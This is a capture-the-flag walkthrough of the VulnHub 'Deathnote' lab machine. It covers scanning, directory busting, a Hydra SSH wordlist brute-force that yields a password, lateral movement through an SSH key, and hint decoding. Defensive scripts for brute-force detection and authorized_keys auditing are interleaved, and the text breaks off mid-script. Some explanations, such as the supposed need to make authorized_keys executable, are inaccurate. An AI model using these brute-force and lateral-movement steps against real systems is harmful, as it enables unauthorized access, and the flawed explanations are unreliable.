Setup VulnHub Machine: –
- First, download the machine image from VulnHub (https://download.vulnhub.com/deathnote/Deathnote.ova).
- Open VirtualBox, click Import and select the downloaded file.
- Once the import succeeds, configure the guest's network interface in VirtualBox. This will help you in the enumeration phase.
- Finally, check that the Network Adapter is set to Host-only Adapter.
The Walkthrough: –
Step 1:- (Enumeration)
Find the target IP address using Netdiscover.
┌─(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0

From the scan result, we have discovered our target IP address: 192.168.56.112.
Now that we have the IP address, let's perform a network scan to detect which ports are open. Port scanning is an essential part of the enumeration process: it helps us understand the attack surface and design targeted attacks. As in most cases, we are going to use the well-known Nmap tool with the following switches:
- -sS: TCP SYN scan. It is the quick, default and most popular scan type and can scan thousands of ports.
- -sC: Performs a script scan using the default set of NSE scripts.
- -sV: Enables version detection, which identifies which service versions run on which ports.
- -p-: Scans all 65535 ports.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.112
[sudo] password for rootharsh:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 12:54 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.112
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5eb8ff2dacc7e93c992f3bfcda5ca353 (RSA)
| 256 a8f3819d0adc169a49eebc24e4655ca6 (ECDSA)
|_ 256 4f20c32d19755be81f320175c2709a7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D6:40:0D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.36 seconds
┌──(rootharsh㉿kali)-[~]
└─$
From the network scan, we have found two open ports.
- Port 22/TCP runs an SSH service, which means that if we obtain valid credentials it will be easy to log in to the server.
- Port 80/TCP runs an HTTP service, which indicates that a website is being hosted.
So, let's take a look at the web content on port 80. To view it ourselves, open a web browser and navigate to the target's IP address in the URL bar.

When we try to access the page through the browser we are presented with the following error: the browser can't connect to the server at "deathnote.vuln".
This type of error appears for one of two underlying reasons:
- We mistyped the address in the URL bar, so the DNS servers cannot find an IP address for the mistyped name.
- We never entered a hostname like "deathnote.vuln" in the URL bar, but the website refers to itself by that name and expects it to resolve.
This can be fixed by editing the local hosts file, /etc/hosts. Open a terminal and run the following command to add the IP address with its associated hostname to the hosts table, which allows your web client to reach the website that was previously reporting an error.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nano /etc/hosts

Now save the file with CTRL + X and hit Enter. You can verify the /etc/hosts table using the following command.
Once this configuration is complete, reload the target's webpage and verify that it loads. Since the requested hostname now has an entry in your /etc/hosts file, the website loads without any issues.

After analyzing the URL at the top of the window, I can confirm that the website appears to be built with the WordPress CMS.
As we know, WordPress websites can be easy targets, as they are often left vulnerable (outdated core, themes or plugins). So we run the WPScan tool against the target application to identify known vulnerabilities.
Note: WPScan checks whether the running WordPress version is vulnerable and whether the installed themes and plugins are up to date or known to be vulnerable.
From the WPScan output, we notice that the running WordPress version itself is not vulnerable, but we find some interesting and useful misconfigurations that can help us gain a foothold on the server.
They are:
- Headers, which indicate that the server runs Apache.
- XML-RPC is enabled, but it is not useful at this moment.
- The WordPress readme.txt is accessible; it contains the WordPress installation procedure.
- The uploads directory has directory listing enabled, which means we can directly browse the content within the WordPress uploads directory.
Some other findings are listed too; have a look at them as well. Next, let's enumerate the target URL: there might be hidden or hard-to-find directories and pages, which can be discovered through directory busting.
Using gobuster as our tool of choice, we use the following switches to get fast, accurate results:
- dir: Specifies directory enumeration mode.
- -u: Specifies the target URL.
- -w: Specifies the path to the wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/wordpress/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/03 14:58:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-admin (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/wp-content (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-includes (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2023/04/03 14:58:54 Finished
===============================================================
┌──(rootharsh㉿kali)-[~]
└─$
As a result of directory busting, we found the WP admin login page. Since we don't have a valid username and password, we can't log in yet.
So far we have only run directory busting against the WordPress directory; there might be other hidden or hard-to-find directories and pages on "deathnote.vuln" itself.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/03 15:00:13 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 197]
/manual (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt (Status: 200) [Size: 68]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
===============================================================
2023/04/03 15:00:14 Finished
===============================================================
┌──(rootharsh㉿kali)-[~]
└─$
From the result of directory busting, we also found a "robots.txt" file. Let's dig into this file and see whether it contains any sensitive information that might help us gain a foothold.
From "robots.txt" we discover another hint: it points to an image file, 'important.jpg', that seems to have been added to the target application by mistake. So let's open 'important.jpg' in the browser.
When I try to open the file, the browser shows an error. So I decided to download the image file to our Kali machine for further analysis. Open a new terminal and type the following command:
┌──(rootharsh㉿kali)-[~]
└─$ wget http://deathnote.vuln/important.jpg
--2023-04-03 15:13:12-- http://deathnote.vuln/important.jpg
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.112
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.112|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’
important.jpg 100%[======================>] 277 --.-KB/s in 0s
2023-04-03 15:13:12 (57.2 MB/s) - ‘important.jpg’ saved [277/277]
┌──(rootharsh㉿kali)-[~]
└─$
You can find the downloaded file in the home directory on Kali.
Let me open this image file from here. As you can see, the same error occurs.
There might be something wrong with this file, so let me run the file command to determine its actual type.
┌──(rootharsh㉿kali)-[~]
└─$ file important.jpg
important.jpg: ASCII text
┌──(rootharsh㉿kali)-[~]
└─$
From the output we learn that the file is ASCII text, i.e. a plain text file. So rename the file with a .txt extension and open it.
The hint message contains a piece of information that could help us log in to the target application. Earlier, we saw that a "user.txt" file exists within the uploads directory.
Let us open the "user.txt" file in a new tab.
As you can see, a few usernames are listed in this wordlist. If we also had a wordlist of passwords, we could perform a brute-force attack to obtain access.
Step 2:- (Foothold)
While exploring the uploads directory, I identified that the "notes.txt" file might be a wordlist containing passwords.
Now we have wordlists for both usernames and passwords, so let's perform a brute-force attack to find a valid username with its password.
Before that, we download these files using the wget command-line utility.
┌──(rootharsh㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
--2023-04-03 15:27:44-- http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.112
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.112|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [text/plain]
Saving to: ‘user.txt’
user.txt 100%[======================>] 91 --.-KB/s in 0s
2023-04-03 15:27:44 (7.17 MB/s) - ‘user.txt’ saved [91/91]
┌──(rootharsh㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
--2023-04-03 15:28:15-- http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.112
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.112|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 449 [text/plain]
Saving to: ‘notes.txt’
notes.txt 100%[======================>] 449 --.-KB/s in 0s
2023-04-03 15:28:15 (63.2 MB/s) - ‘notes.txt’ saved [449/449]
┌──(rootharsh㉿kali)-[~]
└─$
The most widely used tool for this is Hydra, which allows us to perform various kinds of brute-force attacks using wordlists.
- -L: Loads several logins from the specified wordlist.
- -P: Loads several passwords from the specified wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ hydra -L user.txt -P notes.txt ssh://192.168.56.112
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 15:31:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 279.00 tries/min, 279 tries in 00:01h, 454 to do in 00:02h, 14 active
[22][ssh] host: 192.168.56.112 login: l password: death4me
[STATUS] 265.00 tries/min, 530 tries in 00:02h, 203 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-03 15:34:30
┌──(rootharsh㉿kali)-[~]
└─$
From the output above, we have discovered a username and its password (highlighted below).
[22][ssh] host: 192.168.56.112 login: l password: death4me
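A wordlist attack like the one above leaves a very recognisable trail in the target's auth log: a burst of "Failed password" lines from one source address, often ending in an "Accepted" line for the account that finally matched. The following Python script is an added example (not part of the original write-up) that runs that detection logic over a few constructed Debian-style auth.log lines; the source addresses, PIDs and timestamps are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in Debian auth.log format: a burst of failures from one
# source (mimicking the hydra run) that ends in a successful login, plus one
# unrelated failure and a key-based login from a second, benign address.
SAMPLE_AUTH_LOG = """\
Apr  3 15:31:44 deathnote sshd[1201]: Failed password for invalid user user1 from 192.168.56.1 port 51000 ssh2
Apr  3 15:31:44 deathnote sshd[1202]: Failed password for invalid user user1 from 192.168.56.1 port 51001 ssh2
Apr  3 15:31:45 deathnote sshd[1203]: Failed password for l from 192.168.56.1 port 51002 ssh2
Apr  3 15:31:45 deathnote sshd[1204]: Failed password for l from 192.168.56.1 port 51003 ssh2
Apr  3 15:31:46 deathnote sshd[1205]: Failed password for kira from 192.168.56.1 port 51004 ssh2
Apr  3 15:31:46 deathnote sshd[1206]: Failed password for kira from 192.168.56.1 port 51005 ssh2
Apr  3 15:31:47 deathnote sshd[1207]: Accepted password for l from 192.168.56.1 port 51006 ssh2
Apr  3 15:40:00 deathnote sshd[1300]: Failed password for l from 192.168.56.20 port 40000 ssh2
Apr  3 15:40:30 deathnote sshd[1301]: Accepted publickey for l from 192.168.56.20 port 40001 ssh2
"""

# One regex covers both outcomes; "invalid user" is optional because sshd
# only prints it for accounts that do not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_ts(ts: str, year: int = 2023) -> datetime:
    # Syslog timestamps carry no year; assume one for the demo.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60):
    """Return one finding per source IP that produced `threshold` or more
    failed logins inside any `window_seconds` span, together with the user
    names it tried and any account it subsequently logged in to."""
    failures = defaultdict(list)    # src -> failure timestamps
    users_tried = defaultdict(set)  # src -> set of user names
    successes = defaultdict(list)   # src -> [(timestamp, user)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        if m["result"] == "Failed":
            failures[m["src"]].append(ts)
            users_tried[m["src"]].add(m["user"])
        else:
            successes[m["src"]].append((ts, m["user"]))

    findings = []
    for src, times in failures.items():
        times.sort()
        # Sliding window: largest number of failures within window_seconds.
        peak, left = 0, 0
        for right in range(len(times)):
            while (times[right] - times[left]).total_seconds() > window_seconds:
                left += 1
            peak = max(peak, right - left + 1)
        if peak < threshold:
            continue
        # A success from the same source after the failures began is the
        # signature of a wordlist hit rather than a mistyped password.
        logged_in = [u for t, u in successes.get(src, []) if t >= times[0]]
        findings.append({
            "src": src,
            "failures_in_window": peak,
            "users_tried": sorted(users_tried[src]),
            "succeeded_as": logged_in,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(finding)
```

On a real host the same logic is what fail2ban's sshd jail implements; the threshold and window are the two knobs worth tuning.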
Now we have a valid username and password to log in to the server with the SSH client. So let's try to log in.
┌──(rootharsh㉿kali)-[~]
└─$ ssh l@192.168.56.112
The authenticity of host '192.168.56.112 (192.168.56.112)' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.56.112' (ED25519) to the list of known hosts.
l@192.168.56.112's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$
The login was successful. Run the following commands to obtain the user flag.
l@deathnote:~$ ls
user.txt
l@deathnote:~$ cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
l@deathnote:~$
The content of the user flag looks like a hint encoded as a Brainfuck program. To decode it we can use an online decoder.
As you can see, a message appears after decoding it.
Step 3:- (Privilege Escalation)
Let me run the "id" command to find out the user and group names and numeric IDs (UID, GID) of the current user.
l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
l@deathnote:~$
Since user l does not have sudo privileges, we will gather further information about the target machine that could be useful for gaining root access.
Let's identify the rights and privileges of the current user by executing the sudo -l command.
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$
The output shows that the current user is not allowed to run sudo, which means there might be another user with permission to run sudo commands.
To find out which user that is, look in the home directory: run the ls command to list the directories within /home.
l@deathnote:~$ cd /home
l@deathnote:/home$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 19 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 kira
drwxr-xr-x 4 l l 4096 Sep 4 2021 l
l@deathnote:/home$
There are two directories, one for kira and another for l. That means user kira might have root permissions.
We don't have access as user kira, but we can still check the files inside the directory.
l@deathnote:/home$ cd kira/
l@deathnote:/home/kira$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 kira kira 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx------ 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r--r-- 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
l@deathnote:/home/kira$
There are no special files, except "kira.txt". Let me have a look at it.
l@deathnote:/home/kira$ cat kira.txt
cat: kira.txt: Permission denied
l@deathnote:/home/kira$
This shows an error because we don't have permission to read it. That means we have to switch to user kira, but we don't have the password.
We may still be able to switch to user kira with the help of SSH. As you can see, there is a directory named ".ssh", which holds the access credentials for the SSH protocol.
l@deathnote:/home/kira$ cd .ssh/
l@deathnote:/home/kira/.ssh$ ls -al
total 12
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 ..
-rw-r--r-- 1 kira kira 393 Jul 19 2021 authorized_keys
l@deathnote:/home/kira/.ssh$
The ".ssh" directory contains an "authorized_keys" file, which holds the public keys accepted for public-key authentication. Let me have a look at it.
l@deathnote:/home/kira/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$
As you can see from the key comment (l@deathnote), user l has permission to access this account over SSH. Before that, we have to add this authorized key to the .ssh directory within user l's home directory.
l@deathnote:/home/kira/.ssh$ cd /home/l
l@deathnote:~$ ls -al
total 36
drwxr-xr-x 4 l l 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 l l 3 Sep 4 2021 .bash_history
-rw-r--r-- 1 l l 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 l l 3526 Jul 19 2021 .bashrc
drwxr-xr-x 3 l l 4096 Jul 19 2021 .local
-rw-r--r-- 1 l l 807 Jul 19 2021 .profile
drwx------ 2 l l 4096 Sep 4 2021 .ssh
-rw-r--r-- 1 root root 512 Jul 19 2021 user.txt
l@deathnote:~$
Create a new authorized_keys file with the vi text editor:
l@deathnote:~$ cd .ssh/
l@deathnote:~/.ssh$ ls -al
total 20
drwx------ 2 l l 4096 Sep 4 2021 .
drwxr-xr-x 4 l l 4096 Sep 4 2021 ..
-rw------- 1 l l 1823 Jul 19 2021 id_rsa
-rw-r--r-- 1 l l 393 Jul 19 2021 id_rsa.pub
-rw-r--r-- 1 l l 222 Sep 4 2021 known_hosts
l@deathnote:~/.ssh$ vi authorized_keys
We can verify it using the cat command.
l@deathnote:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZN
h4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAG
HaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V
0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75m
i6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQI
CFZ6z l@deathnote
l@deathnote:~/.ssh$
As this file does not have executable permission, we have to set it using the following command.
l@deathnote:~/.ssh$ ls -al
total 24
drwx------ 2 l l 4096 Sep 8 07:23 .
drwxr-xr-x 4 l l 4096 Sep 4 2021 ..
-rw-r--r-- 1 l l 393 Sep 8 07:23 authorized_keys
-rw------- 1 l l 1823 Jul 19 2021 id_rsa
-rw-r--r-- 1 l l 393 Jul 19 2021 id_rsa.pub
-rw-r--r-- 1 l l 444 Sep 8 07:25 known_hosts
l@deathnote:~/.ssh$ chmod +x authorized_keys
l@deathnote:~/.ssh$
Now run the SSH client to switch to user kira.
l@deathnote:~/.ssh$ ssh kira@192.168.56.112
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$
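The lateral move just shown works because kira's authorized_keys contains a key that belongs to a different local account (the comment says l@deathnote and the blob matches l's id_rsa.pub). That is something a defender can audit for. The following Python script is an added example (not from the original write-up) that checks every user's authorized_keys under a home root for foreign key comments, keys shared between accounts, keys matching another user's id_*.pub, and odd file modes; it builds a constructed fixture in a temporary directory that mirrors the layout on this box, with placeholder key blobs rather than real keys.

```python
import os
import stat
import tempfile
from collections import defaultdict
from pathlib import Path

# Constructed fixture mirroring the box: kira's authorized_keys holds l's key
# (comment l@deathnote, same blob as l/.ssh/id_rsa.pub) and l's own
# authorized_keys was created with chmod +x. Blobs are placeholders.
KEY_L = "ssh-rsa AAAAB3NzaC1yc2E_PLACEHOLDER_BLOB_L l@deathnote\n"
FIXTURE = {
    "kira/.ssh/authorized_keys": (KEY_L, 0o600),
    "l/.ssh/id_rsa.pub": (KEY_L, 0o644),
    "l/.ssh/authorized_keys": (KEY_L, 0o755),
}
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-", "ssh-dss", "sk-")


def build_fixture(root: Path) -> None:
    for rel, (content, mode) in FIXTURE.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)
        os.chmod(path, mode)


def parse_key_line(line: str):
    """Return (key_type, blob, comment) or None for blank/comment lines.
    A leading options field (e.g. from="...") is skipped if present."""
    fields = line.strip().split()
    if not fields or fields[0].startswith("#"):
        return None
    for i, field in enumerate(fields):
        if field.startswith(KEY_TYPES) and i + 1 < len(fields):
            return field, fields[i + 1], " ".join(fields[i + 2:])
    return None


def audit_authorized_keys(home_root: Path):
    """Audit <home_root>/<user>/.ssh/authorized_keys for every user and return
    sorted (account, kind, detail) findings: foreign-comment, pub-of-other-user,
    shared-key, unexpected-mode (group/world-writable, which sshd StrictModes
    rejects, or executable, which authorized_keys never needs)."""
    users = sorted(p.name for p in home_root.iterdir() if p.is_dir())
    pubkeys = {}  # blob -> user whose id_*.pub carries it
    for user in users:
        for pub in (home_root / user / ".ssh").glob("id_*.pub"):
            parsed = parse_key_line(pub.read_text())
            if parsed:
                pubkeys[parsed[1]] = user
    blob_owners = defaultdict(set)
    findings = []
    bad_bits = stat.S_IWGRP | stat.S_IWOTH | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    for user in users:
        ak = home_root / user / ".ssh" / "authorized_keys"
        if not ak.is_file():
            continue
        mode = stat.S_IMODE(ak.stat().st_mode)
        if mode & bad_bits:
            findings.append((user, "unexpected-mode", oct(mode)))
        for line in ak.read_text().splitlines():
            parsed = parse_key_line(line)
            if not parsed:
                continue
            _ktype, blob, comment = parsed
            blob_owners[blob].add(user)
            comment_user = comment.split("@")[0]
            if comment_user and comment_user != user and comment_user in users:
                findings.append((user, "foreign-comment", comment))
            if blob in pubkeys and pubkeys[blob] != user:
                findings.append((user, "pub-of-other-user", pubkeys[blob]))
    for blob, owners in blob_owners.items():
        if len(owners) > 1:
            findings.append((",".join(sorted(owners)), "shared-key", blob[:12]))
    return sorted(findings)


def run_demo():
    # Build the constructed fixture in a scratch directory and audit it.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_fixture(root)
        return audit_authorized_keys(root)
```

Point `audit_authorized_keys` at `/home` (as root) to run it on a real system.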
We have successfully switched to user kira, who has the right to read the "kira.txt" file.
kira@deathnote:~$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 kira kira 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx------ 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r--r-- 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
kira@deathnote:~$ cat kira.txt
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
kira@deathnote:~$
This file contains some text that appears to be base64-encoded. Let me decode it.
kira@deathnote:~$ echo "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp" | base64 -d
please protect one of the following
1. L (/opt)
2. Misa (/var)
kira@deathnote:~$
From the output, we learn that the "/opt" directory might contain something special. Let me change to that directory and list its files and directories.
kira@deathnote:~$ cd /opt/
kira@deathnote:/opt$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Aug 29 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 root root 4096 Aug 29 2021 L
kira@deathnote:/opt$
Here is another directory. Let me change into it.
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 29 2021 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
drwxr-xr-x 2 root root 4096 Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4096 Aug 29 2021 kira-case
kira@deathnote:/opt/L$
Directory L contains two more directories. Let’s have a look at the “fake-notebook-rule” directory.
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Aug 29 2021 .
drwxr-xr-x 4 root root 4096 Aug 29 2021 ..
-rw-r--r-- 1 root root 84 Aug 29 2021 case.wav
-rw-r--r-- 1 root root 15 Aug 29 2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$
The "fake-notebook-rule" directory contains two files: one is apparently an audio file (case.wav) and the other is a hint in text form. Let's see what the hint says.
kira@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef
kira@deathnote:/opt/L/fake-notebook-rule$
The hint tells us to use the CyberChef tool, which means there is probably some encoded text here.
Let me run the file utility to determine the type of the file:
kira@deathnote:/opt/L/fake-notebook-rule$ file case.wav
case.wav: ASCII text
kira@deathnote:/opt/L/fake-notebook-rule$
So "case.wav" is not an audio file but a text file. Let me open it using the cat command.
kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$
The "case.wav" file contains hexadecimal digits, which can be decoded using CyberChef.
The output appears to be base64. Let me decode it as well.
Once it is decoded, you will notice the password for user kira.
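Both hints on this box (kira.txt above and case.wav here) are plain text wrapped in one or two encoding layers, which is exactly the kind of recipe CyberChef builds by hand. The following Python script is an added example (not from the original write-up) that peels such layers automatically: it tries hex, then base64, and stops as soon as the result no longer looks encoded. The two inputs are copied from the page; the detection heuristics are my own.

```python
import base64
import binascii
import re
import string

# Values copied from the page: the contents of kira.txt and case.wav.
KIRA_TXT = "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp"
CASE_WAV = "63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d"

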